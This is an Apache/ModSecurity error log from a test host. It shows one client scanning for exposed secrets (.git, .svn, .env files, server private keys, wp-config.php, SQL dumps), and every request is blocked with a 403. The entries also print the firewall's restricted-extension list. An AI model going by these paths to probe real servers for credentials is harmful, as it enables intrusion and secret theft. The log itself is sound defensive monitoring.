[Thu Jul 31 09:07:28.559216 2025] [:error] [pid 1592149] [client 213.232.87.234:38619] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aIsWMGFBPwXgSYxFRsaiIAAAAAc"]
[Thu Jul 31 09:07:28.559375 2025] [:error] [pid 1590723] [client 213.232.87.234:38715] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aIsWMDDZocKijFEs7hEI8AAAAAM"]
[Thu Jul 31 09:07:28.559382 2025] [:error] [pid 1592149] [client 213.232.87.234:38619] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aIsWMGFBPwXgSYxFRsaiIAAAAAc"]
[Thu Jul 31 09:07:28.559531 2025] [:error] [pid 1592149] [client 213.232.87.234:38619] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aIsWMGFBPwXgSYxFRsaiIAAAAAc"]
[Thu Jul 31 09:07:28.559532 2025] [:error] [pid 1590723] [client 213.232.87.234:38715] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aIsWMDDZocKijFEs7hEI8AAAAAM"]
[Thu Jul 31 09:07:28.611280 2025] [:error] [pid 1592564] [client 213.232.87.234:28233] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aIsWMBumDW3eI9CU7jSWLAAAAA0"]
[Thu Jul 31 09:07:28.611426 2025] [:error] [pid 1592564] [client 213.232.87.234:28233] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aIsWMBumDW3eI9CU7jSWLAAAAA0"]
[Thu Jul 31 09:07:28.611620 2025] [:error] [pid 1592564] [client 213.232.87.234:28233] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aIsWMBumDW3eI9CU7jSWLAAAAA0"]
[Thu Jul 31 09:07:28.611779 2025] [:error] [pid 1592564] [client 213.232.87.234:28233] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aIsWMBumDW3eI9CU7jSWLAAAAA0"]
[Thu Jul 31 09:07:28.614864 2025] [:error] [pid 1591386] [client 213.232.87.234:38389] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aIsWMOljAkeYCp7QCXZyqAAAAAY"]
[Thu Jul 31 09:07:28.615115 2025] [:error] [pid 1591386] [client 213.232.87.234:38389] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aIsWMOljAkeYCp7QCXZyqAAAAAY"]
[Thu Jul 31 09:07:28.615289 2025] [:error] [pid 1591386] [client 213.232.87.234:38389] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aIsWMOljAkeYCp7QCXZyqAAAAAY"]
[Thu Jul 31 09:07:28.698889 2025] [authz_core:error] [pid 1590754] [client 213.232.87.234:7255] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jul 31 09:07:28.909047 2025] [:error] [pid 1590754] [client 213.232.87.234:40153] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsWMCiYD7R6T6im77vdUQAAAAU"]
[Thu Jul 31 09:07:28.909174 2025] [:error] [pid 1592565] [client 213.232.87.234:37567] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aIsWMBTbwDTjy7t9G4WXjQAAAA4"]
[Thu Jul 31 09:07:28.909267 2025] [:error] [pid 1590754] [client 213.232.87.234:40153] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsWMCiYD7R6T6im77vdUQAAAAU"]
[Thu Jul 31 09:07:28.909429 2025] [:error] [pid 1590754] [client 213.232.87.234:40153] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIsWMCiYD7R6T6im77vdUQAAAAU"]
[Thu Jul 31 09:07:28.909449 2025] [:error] [pid 1592565] [client 213.232.87.234:37567] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aIsWMBTbwDTjy7t9G4WXjQAAAA4"]
[Thu Jul 31 09:07:28.909607 2025] [:error] [pid 1592565] [client 213.232.87.234:37567] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aIsWMBTbwDTjy7t9G4WXjQAAAA4"]
[Thu Jul 31 09:07:28.998966 2025] [:error] [pid 1590722] [client 213.232.87.234:49985] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIsWMGiVPVgtcxTHeBh0IgAAAAI"]
[Thu Jul 31 09:07:28.999158 2025] [:error] [pid 1590722] [client 213.232.87.234:49985] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIsWMGiVPVgtcxTHeBh0IgAAAAI"]
[Thu Jul 31 09:07:28.999319 2025] [:error] [pid 1590722] [client 213.232.87.234:49985] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIsWMGiVPVgtcxTHeBh0IgAAAAI"]
[Thu Jul 31 09:07:29.040641 2025] [:error] [pid 1592149] [client 213.232.87.234:15517] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aIsWMWFBPwXgSYxFRsaiIgAAAAc"]
[Thu Jul 31 09:07:29.040959 2025] [:error] [pid 1592149] [client 213.232.87.234:15517] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aIsWMWFBPwXgSYxFRsaiIgAAAAc"]
[Thu Jul 31 09:07:29.041128 2025] [:error] [pid 1592149] [client 213.232.87.234:15517] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aIsWMWFBPwXgSYxFRsaiIgAAAAc"]
[Thu Jul 31 09:07:29.043705 2025] [:error] [pid 1592564] [client 213.232.87.234:57997] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aIsWMRumDW3eI9CU7jSWLgAAAA0"]
[Thu Jul 31 09:07:29.043999 2025] [:error] [pid 1592564] [client 213.232.87.234:57997] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aIsWMRumDW3eI9CU7jSWLgAAAA0"]
[Thu Jul 31 09:07:29.044161 2025] [:error] [pid 1592564] [client 213.232.87.234:57997] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aIsWMRumDW3eI9CU7jSWLgAAAA0"]
[Thu Jul 31 09:07:29.085276 2025] [:error] [pid 1590721] [client 213.232.87.234:34213] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aIsWMX-jmlLViQ_nFx7EtQAAAAE"]
[Thu Jul 31 09:07:29.085449 2025] [:error] [pid 1590721] [client 213.232.87.234:34213] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aIsWMX-jmlLViQ_nFx7EtQAAAAE"]
[Thu Jul 31 09:07:29.085621 2025] [:error] [pid 1590721] [client 213.232.87.234:34213] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aIsWMX-jmlLViQ_nFx7EtQAAAAE"]
[Thu Jul 31 09:07:29.100362 2025] [:error] [pid 1590754] [client 213.232.87.234:62511] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aIsWMSiYD7R6T6im77vdUgAAAAU"]
[Thu Jul 31 09:07:29.100667 2025] [:error] [pid 1590754] [client 213.232.87.234:62511] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aIsWMSiYD7R6T6im77vdUgAAAAU"]
[Thu Jul 31 09:07:29.100821 2025] [:error] [pid 1590754] [client 213.232.87.234:62511] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aIsWMSiYD7R6T6im77vdUgAAAAU"]
[Thu Jul 31 09:07:29.107807 2025] [:error] [pid 1591386] [client 213.232.87.234:22627] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIsWMeljAkeYCp7QCXZyqgAAAAY"]
[Thu Jul 31 09:07:29.108016 2025] [:error] [pid 1591386] [client 213.232.87.234:22627] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIsWMeljAkeYCp7QCXZyqgAAAAY"]
[Thu Jul 31 09:07:29.108173 2025] [:error] [pid 1591386] [client 213.232.87.234:22627] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIsWMeljAkeYCp7QCXZyqgAAAAY"]
